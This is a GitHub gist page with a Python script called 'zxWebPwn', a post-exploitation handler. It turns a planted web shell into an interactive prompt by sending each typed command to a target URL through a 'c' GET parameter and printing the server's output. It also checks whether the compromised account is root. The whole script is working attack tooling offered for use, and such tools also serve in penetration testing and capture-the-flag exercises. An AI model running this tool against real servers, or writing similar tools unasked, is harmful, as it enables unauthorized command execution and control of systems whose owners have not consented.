Skip to content

Instantly share code, notes, and snippets.

@zxlim
Created January 23, 2021 17:52
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save zxlim/68465045a57bf7b29949629cb6d2204f to your computer and use it in GitHub Desktop.
A very simple pseudo shell in Python to interact with web shells more effectively.
#!/usr/bin/env python3
##################################################
# Copyright (c) 2020 Zhao Xiang Lim.
# All Rights Reserved.
# Released under the MIT License.
#
# [ developer@zxlim.xyz ]
##################################################
from argparse import ArgumentParser
from urllib.parse import urlparse
import cmd
import requests
def execute_command(url, cmd):
try:
response = requests.get(url, params={"c": cmd})
if response.status_code == 200:
return True, response.text
else:
return False, f"[!] HTTP Error Code: {response.status_code}\n\n{response.text}"
except requests.exceptions.ConnectionError:
return False, f"[!] Failed to connect to target URL: {url}"
def get_shell_prompt(url):
cmd_success, response = execute_command(url.geturl(), "whoami")
if cmd_success:
username = str(response.strip())
suffix = "$"
if username.lower() == "root":
suffix = "#"
return f"[zxWebPwn] {username}@{url.hostname} {suffix} "
return False
class zxWebPwnHandler(cmd.Cmd):
def __init__(self, url, prompt = "[zxWebPwn] $ "):
super(zxWebPwnHandler, self).__init__()
self.url = url
self.prompt = str(prompt)
def do_help(self, line):
print("[zxWebPwn] You need no help. Just treat this as a 'normal' shell...")
def default(self, line):
if line in ("zxpwn-reload-user", "zxpwn-update-user"):
self.prompt = get_shell_prompt(self.url)
elif line.startswith("cd"):
# You can't really 'cd' since every command is executed in a new shell instance by the web shell.
print("[-] NOTE: This is not a normal shell! The command 'cd' will not work as expected.")
else:
cmd_success, response = execute_command(self.url.geturl(), line)
print(response)
def do_EOF(self, line):
print()
return True
def do_exit(self, line):
return True
def do_quit(self, line):
return True
def _parse_cmd_args():
parser = ArgumentParser(description = "[zxWebPwn] A Web Shell Handler that improves your sanity. Sort of I guess.")
parser.add_argument("URL", type = str, help = "Full URL of web shell instance to interact with. Make sure it takes in commands via the 'c' GET parameter.")
return parser.parse_args()
def main():
args = _parse_cmd_args()
url = urlparse(args.URL)
shell_prompt = get_shell_prompt(url)
if shell_prompt == False:
print(f"[!] Failed to connect to target URL: {url.geturl()}")
else:
print(f"[+] Connected to target at {url.hostname} ({url.port}/tcp)\n")
handler = zxWebPwnHandler(url, shell_prompt)
handler.cmdloop()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment